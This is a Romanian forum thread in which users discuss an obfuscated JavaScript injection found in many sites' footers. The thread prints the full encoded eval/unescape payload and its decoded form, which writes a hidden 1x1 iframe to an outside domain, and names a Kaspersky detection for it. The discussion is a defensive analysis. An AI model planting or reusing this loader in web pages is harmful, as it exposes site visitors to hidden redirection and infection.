malware

[paxnWo]

azi am dat peste al 6-lea site pe saptamana asta care are inserat in footer:

<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%75%45%75%2C%78%55%6F%2C%45%4E%62%56%2C%61%4C%2C%71%6D%2C%49%4A%29%7B%71%6D%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%49%4A%5B%45%4E%62%56%5D%3D%61%4C%5B%45%4E%62%56%5D%7C%7C%45%4E%62%56%3B%61%4C%3D%5B%66%75%6E%63%74%69%6F%6E%28%71%6D%29%7B%72%65%74%75%72%6E%20%49%4A%5B%71%6D%5D%7D%5D%3B%71%6D%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%45%4E%62%56%3D%31%7D%3B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%69%66%28%61%4C%5B%45%4E%62%56%5D%29%75%45%75%3D%75%45%75%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%71%6D%28%45%4E%62%56%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%61%4C%5B%45%4E%62%56%5D%29%3B%72%65%74%75%72%6E%20%75%45%75%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%68%65%72%74%79%62%61%78%79%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->

site-urile nu au nicio legatura intre ele, doar ca sunt din ro. toate au commentul " uy7gdr5kmn ".

hexul de mai sus decriptat:

eval(function(uEu,xUo,ENbV,aL,qm,IJ){qm=String;if(!''.replace(/^/,String)){while(ENbV--)IJ[ENbV]=aL[ENbV]||ENbV;aL=[function(qm){return IJ[qm]}];qm=function(){return'\\w+'};ENbV=1};while(ENbV--)if(aL[ENbV])uEu=uEu.replace(new RegExp('\\b'+qm(ENbV)+'\\b','g'),aL[ENbV]);return uEu}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com||write|width|hertybaxy|document|http|src|iframe|height'.split('|'),0,{}))

iframe catre hertybaxy.com

pana si un html de-al meu a fost infectat cu asta, era singurul de pe host, nu se pune problema ca ar fi luat cineva acces la el. dubios. oricum, autorii scot o gramada de bani.

[linux_terminal]

E interesant pentru ca si eu mam gandit la unu asemanator, e bine ca e inofensiv:)

Kaspersky mi la gasit ca find::

Trojan-Clicker.JS.Iframe.fc

Si fara antivirus:: Windows 7

C:\WINDOWS\system32\SEARCHPROTOCOLHOST.EXE

Edited April 22, 2010 by linux_terminal

[Fitty]

Si mie mi s-a intamplat, pe mai multe hosturi. Dar macar eu nu ma alarmez si ma pis pe ele.

@linux_terminal: Windows user? ))

[loki]

astea iti infecteaza toate fisierele html php pe care le gaseste. Tre sa scanezi tot pe acolo. Am patit-o acasa candva si mai tarziu pe awardspace da acolo nu m-am prins pe unde a intrat, nu aveam nimic care sa permita scrieri.